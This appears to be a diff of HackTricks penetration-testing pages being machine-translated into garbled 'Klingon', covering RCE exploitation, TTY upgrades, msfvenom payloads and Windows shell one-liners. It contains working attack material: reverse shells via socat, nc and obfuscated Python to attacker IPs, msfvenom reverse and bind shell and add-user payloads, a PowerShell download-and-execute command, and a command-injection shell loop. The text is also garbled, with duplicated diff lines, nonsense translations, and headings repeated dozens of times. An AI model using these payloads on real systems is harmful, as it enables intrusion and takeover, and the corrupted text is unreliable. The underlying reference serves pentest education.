resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0) resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
return resp.json() return resp.json()
def get_random_string(guid, path): def get_random_string(guid, path):
return ''.join(random.choice(string.ascii_letters) for i in range(10)) return ''.join(random.choice(string.ascii_letters) for i in range(10))
``` ```
## Python cmd to exploit an RCE ## Python cmd to exploit an RCE
### English
To exploit a Remote Code Execution (RCE) vulnerability using Python, you can use the following command:
```python
import requests
url = "http://target.com/vulnerable_endpoint"
payload = "__import__('os').system('command_to_execute')"
response = requests.get(url + "?param=" + payload)
print(response.text)
```
Replace `http://target.com/vulnerable_endpoint` with the URL of the vulnerable endpoint and `command_to_execute` with the command you want to run on the target system.
### Klingon
To exploit a Remote Code Execution (RCE) vulnerability using Python, you can use the following command:
```python
import requests
url = "http://target.com/vulnerable_endpoint"
payload = "__import__('os').system('command_to_execute')"
response = requests.get(url + "?param=" + payload)
print(response.text)
```
Replace `http://target.com/vulnerable_endpoint` with the URL of the vulnerable endpoint and `command_to_execute` with the command you want to run on the target system.
```python ```python
import requests import requests
import re import re
from cmd import Cmd from cmd import Cmd
class Terminal(Cmd): class Terminal(Cmd):
prompt = "Inject => " prompt = "Inject => "
def default(self, args): def default(self, args):
output = RunCmd(args) output = RunCmd(args)
print(output) print(output)
def RunCmd(cmd): def RunCmd(cmd):
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' } data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
r = requests.post('http://10.10.10.127/select', data=data) r = requests.post('http://10.10.10.127/select', data=data)
page = r.text page = r.text
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL) m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
if m: if m:
return m.group(1) return m.group(1)
else: else:
return 1 return 1
term = Terminal() term = Terminal()
term.cmdloop() term.cmdloop()
``` ```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) vIghoS 'ej **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today: Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

View file

@ -31,7 +31,6 @@ You should also try the **shodan** **exploit search** from [https://exploits.sho
### Searchsploit ### Searchsploit
Useful to search exploits for services in **exploitdb from the console.** Useful to search exploits for services in **exploitdb from the console.**
```bash ```bash
#Searchsploit tricks #Searchsploit tricks
searchsploit "linux Kernel" #Example searchsploit "linux Kernel" #Example
@ -41,17 +40,14 @@ searchsploit -p 7618[.c] #Show complete path
searchsploit -x 7618[.c] #Open vi to inspect the exploit searchsploit -x 7618[.c] #Open vi to inspect the exploit
searchsploit --nmap file.xml #Search vulns inside an nmap xml result searchsploit --nmap file.xml #Search vulns inside an nmap xml result
``` ```
### Pompem ### Pompem
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits [https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) vItlhutlh is another tool to search for exploits
### MSF-Search ### MSF-Search
```bash ```bash
msf> search platform:windows port:135 target:XP type:exploit msf> search platform:windows port:135 target:XP type:exploit
``` ```
### PacketStorm ### PacketStorm
If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com) If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com)

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -51,5 +49,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,22 +1,16 @@
# Full TTYs # pIm 'ej 'oH HackTricks AWS Red Team Expert (htARTE) vItlhutlh!
<details> HackTricks Daq 'e' vItlhutlh:
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> * **tlhIngan Hol** vItlhutlh **HackTricks** **ghItlhmeH** 'ej **HackTricks PDF** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**.
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) vItlhutlh.
Other ways to support HackTricks: * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) vItlhutlh, **NFTs** [**opensea.io**](https://opensea.io/collection/the-peass-family) **qaStaHvIS**.
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **joq** 'ej [**telegram group**](https://t.me/peass) **joq** 'ej **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) **vItlhutlh**.
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks** 'ej **HackTricks Cloud** github repos **ghItlhmeH** PRs **jImej**.
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Full TTY ## Full TTY
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. `SHELL` **SHELL** _**/etc/shells**_ **list** **tlhIngan Hol** **ghItlhmeH** **be'**. `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported` **ghItlhmeH**. **bash** **qar** **zsh** **tlhIngan Hol** **ghItlhmeH** **be'** `bash` **chel** **shell** **ghItlhmeH**.
#### Python #### Python
@ -29,20 +23,213 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
{% endcode %} {% endcode %}
{% hint style="info" %} {% hint style="info" %}
You can get the **number** of **rows** and **columns** executing **`stty -a`** **tlhIngan** **Duj** **rows** **'ej** **columns** **number** **'ej** **`stty -a`** **execute** **'ej** **tlhIngan** **script** **'ej** **{% code overflow="wrap" %}**
{% endhint %} {% endhint %}
#### script
{% code overflow="wrap" %}
```bash ```bash
script /dev/null -qc /bin/bash #/dev/null is to not store anything script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
``` ```
{% endcode %} {% code %}
#### socat #### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
#### socat
```bash ```bash
#Listener: #Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444 socat file:`tty`,raw,echo=0 tcp-listen:4444
@ -50,8 +237,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim: #Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
``` ```
### **Qa'vIn shells**
### **Spawn shells**
* `python -c 'import pty; pty.spawn("/bin/sh")'` * `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')` * `echo os.system('/bin/bash')`
@ -105,8 +291,7 @@ reverse-ssh.exe -p 4444 kali@10.0.0.2
``` ```
{% endcode %} {% endcode %}
* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`: * 'ej ReverseSSH port forwarding request vItlhutlh. 'ej, 'oH `reverse-ssh(.exe)` chaw'laHbe'lu'chugh, `letmeinbrudipls` default password log in 'e' vItlhutlh.
```bash ```bash
# Interactive shell access # Interactive shell access
ssh -p 8888 127.0.0.1 ssh -p 8888 127.0.0.1
@ -114,15 +299,12 @@ ssh -p 8888 127.0.0.1
# Bidirectional file transfer # Bidirectional file transfer
sftp -P 8888 127.0.0.1 sftp -P 8888 127.0.0.1
``` ```
## TTY pagh
## No TTY ghorgh vItlhutlh **programmey Dajatlh** vaj user input cha'logh. vaj, password 'e' `sudo` laH 'e' vItlhutlh:
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
```bash ```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact' expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

File diff suppressed because one or more lines are too long

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -38,14 +38,73 @@ Stay informed with the newest bug bounties launching and crucial platform update
One can also use the `-a` to specify the architecture or the `--platform` One can also use the `-a` to specify the architecture or the `--platform`
## Listing ## Listing
```bash ```bash
msfvenom -l payloads #Payloads msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders msfvenom -l encoders #Encoders
``` ```
## tlhIngan Hol
## Common params when creating a shellcode ## QaStaHvIS 'e' vItlhutlh
### -p, --payload
#### -p, --payload
#### -p, --payload
The `-p` parameter specifies the payload to be used when creating the shellcode.
### -f, --format
#### -f, --format
#### -f, --format
The `-f` parameter specifies the output format of the shellcode.
### -e, --encoder
#### -e, --encoder
#### -e, --encoder
The `-e` parameter specifies the encoder to be used for the shellcode.
### -b, --bad-chars
#### -b, --bad-chars
#### -b, --bad-chars
The `-b` parameter specifies any bad characters that should be avoided in the shellcode.
### -i, --iterations
#### -i, --iterations
#### -i, --iterations
The `-i` parameter specifies the number of iterations to be used for encoding the shellcode.
### -a, --arch
#### -a, --arch
#### -a, --arch
The `-a` parameter specifies the architecture for which the shellcode is being created.
### -s, --space
#### -s, --space
#### -s, --space
The `-s` parameter specifies the maximum size of the shellcode.
### -n, --nopsled
#### -n, --nopsled
#### -n, --nopsled
The `-n` parameter specifies the size of the NOP sled to be used in the shellcode.
### -v, --var-name
#### -v, --var-name
#### -v, --var-name
The `-v` parameter specifies the variable name to be used for the shellcode.
### -x, --template
#### -x, --template
#### -x, --template
The `-x` parameter specifies the template file to be used for the shellcode.
```bash ```bash
-b "\x00\x0a\x0d" -b "\x00\x0a\x0d"
-f c -f c
@ -53,7 +112,6 @@ msfvenom -l encoders #Encoders
EXITFUNC=thread EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
``` ```
## **Windows** ## **Windows**
### **Reverse Shell** ### **Reverse Shell**
@ -62,50 +120,70 @@ PrependSetuid=True #Use this to create a shellcode that will execute something w
```bash ```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
``` ```
{% endcode %}
### Bind Shell ### Bind Shell
{% code overflow="wrap" %} {% code overflow="wrap" %}### Bind Shell
Bind Shell is a technique used in hacking to create a shell on a target system that listens for incoming connections. This allows the attacker to gain remote access to the target system and execute commands.
To create a bind shell using msfvenom, you can use the following command:
```plaintext
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output file>
```
- `<payload>`: The payload to use for the bind shell. This can be any payload supported by msfvenom.
- `<attacker IP>`: The IP address of the attacker machine.
- `<attacker port>`: The port on the attacker machine to listen for incoming connections.
- `<format>`: The format of the output file. This can be any format supported by msfvenom, such as exe, elf, or raw.
- `<output file>`: The name of the output file to save the generated shell.
Once the bind shell is created, you can transfer it to the target system and execute it. When the shell is executed, it will start listening for incoming connections on the specified IP address and port. The attacker can then connect to the shell and gain remote access to the target system.
It is important to note that using bind shells can be risky, as they expose the target system to potential attacks. Therefore, it is recommended to use bind shells only in controlled environments and with proper authorization.
```bash ```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
``` ```
{% endcode %} ### lo'la' User
### Create User
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
``` ```
{% endcode %}
### CMD Shell ### CMD Shell
{% code overflow="wrap" %} {% code overflow="wrap" %}### CMD Shell
CMD Shell- 'CMD Shell' is a Windows command-line interpreter that allows you to interact with the operating system through a command prompt. It is commonly used for executing commands, running scripts, and performing various administrative tasks on a Windows system.
To generate a payload using msfvenom for a CMD shell, you can use the following command:
```plaintext
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > shell.exe
```
This command will generate an executable file named 'shell.exe' that will establish a reverse TCP connection to the specified IP address and port. Replace `<attacker IP>` with your IP address and `<attacker port>` with the port you want to use for the connection.
Once you have generated the payload, you can transfer it to the target system and execute it to establish a reverse shell connection.
```bash ```bash
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
``` ```
{% endcode %} ### **QapHa'**
### **Execute Command**
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
``` ```
{% endcode %}
### Encoder ### Encoder
{% code overflow="wrap" %} {% code overflow="wrap" %}### Encoder
{% code overflow="wrap" %}### Encoder
```bash ```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
``` ```
{% endcode %} ### qarDaSqa' executable Daq
### Embedded inside executable
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
@ -122,18 +200,34 @@ msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/wind
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
``` ```
{% endcode %}
### Bind Shell ### Bind Shell
{% code overflow="wrap" %} {% code overflow="wrap" %}### Bind Shell
Bind Shell is a technique used in hacking to create a shell on a target system that listens for incoming connections. This allows the attacker to gain remote access to the target system and execute commands.
To create a bind shell using msfvenom, you can use the following command:
```plaintext
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output file>
```
- `<payload>`: The payload to use for the bind shell. This can be any payload supported by msfvenom.
- `<attacker IP>`: The IP address of the attacker machine.
- `<attacker port>`: The port on the attacker machine to listen for incoming connections.
- `<format>`: The format of the output file. This can be any format supported by msfvenom, such as exe, elf, or raw.
- `<output file>`: The name of the output file to save the generated shell.
Once the bind shell is created, you can transfer it to the target system and execute it. When the shell is executed, it will start listening for incoming connections on the specified IP address and port. The attacker can then connect to the shell and gain remote access to the target system.
It is important to note that using bind shells can be risky, as they expose the target system to potential attacks. Therefore, it is recommended to use bind shells only in controlled environments and with proper authorization.
```bash ```bash
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
``` ```
{% endcode %}
### SunOS (Solaris) ### SunOS (Solaris)
{% code overflow="wrap" %}### SunOS (Solaris)
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
@ -148,10 +242,10 @@ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTAC
```bash ```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
``` ```
{% endcode %}
### **Bind Shell** ### **Bind Shell**
{% code overflow="wrap" %}### **Bind Shell**
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
@ -186,6 +280,10 @@ msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
#### Reverse shell #### Reverse shell
{% code overflow="wrap" %}JSP
#### Reverse shell
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
@ -200,18 +298,218 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f r
```bash ```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
``` ```
{% endcode %} {% code %}
### NodeJS ### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
### NodeJS
```bash ```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
``` ```
## **Script Language payloads** ## **Script Language payloads**
### **Perl** ### **Perl**
{% code overflow="wrap" %}## **Script Language payloads**
### **Perl**
{% code overflow="wrap" %} {% code overflow="wrap" %}
```bash ```bash
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
@ -236,7 +534,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
**Hacking Insights**\ **Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking Engage with content that delves into the thrill and challenges of hacking

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -28,15 +28,12 @@ The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Wi
Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.** Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.**
## NC ## NC
```bash ```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT> nc.exe -e cmd.exe <Attacker_IP> <PORT>
``` ```
## SBD ## SBD
**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat. **[sbd](https://www.kali.org/tools/sbd/) HochmeH je netcat alternative**. vItlhutlh Unix-like systemmey je Win32. vItlhutlh encryption, program execution, customizable source ports, je continuous reconnection, sbd vItlhutlh TCP/IP communication solution. Windows users, sbd.exe version vItlhutlh Kali Linux distribution netcat replacement.
```bash ```bash
# Victims machine # Victims machine
sbd -l -p 4444 -e bash -v -n sbd -l -p 4444 -e bash -v -n
@ -48,47 +45,226 @@ sbd 10.10.10.10 4444
id id
uid=0(root) gid=0(root) groups=0(root) uid=0(root) gid=0(root) groups=0(root)
``` ```
## Python ## Python
### Introduction
Python is a versatile and powerful programming language that is widely used in the field of hacking. It provides a wide range of libraries and modules that can be leveraged for various hacking tasks. In this section, we will explore some of the key features and functionalities of Python that make it an excellent choice for hacking.
### Key Features of Python for Hacking
1. **Simplicity**: Python has a clean and easy-to-understand syntax, making it beginner-friendly and allowing hackers to quickly write and execute code.
2. **Portability**: Python is a cross-platform language, meaning that Python code can run on different operating systems without any modifications. This makes it convenient for hackers who need to work on multiple platforms.
3. **Extensibility**: Python allows hackers to easily extend its functionality by importing and using various libraries and modules. There are numerous libraries available for tasks such as network scanning, web scraping, cryptography, and more.
4. **Interactivity**: Python provides an interactive shell, which allows hackers to execute code line by line and see the results immediately. This makes it easier to debug and test code during the hacking process.
5. **Integration**: Python can be easily integrated with other languages, such as C and C++, allowing hackers to leverage existing code and libraries written in these languages.
### Python Libraries for Hacking
Python offers a wide range of libraries that can be used for hacking purposes. Some of the most commonly used libraries include:
- **Scapy**: A powerful packet manipulation library that allows hackers to create, send, and capture network packets.
- **Requests**: A library for making HTTP requests, which is useful for tasks such as web scraping and interacting with web applications.
- **Paramiko**: A library for SSH protocol implementation, which allows hackers to automate tasks such as remote command execution and file transfer.
- **Crypto**: A library that provides various cryptographic functions, such as encryption, decryption, hashing, and more.
- **BeautifulSoup**: A library for parsing HTML and XML documents, which is useful for web scraping and extracting data from websites.
### Conclusion
Python is a versatile and powerful programming language that is widely used in the field of hacking. Its simplicity, portability, extensibility, interactivity, and integration capabilities make it an excellent choice for hackers. By leveraging the various libraries available in Python, hackers can perform a wide range of hacking tasks efficiently and effectively.
```bash ```bash
#Windows #Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if 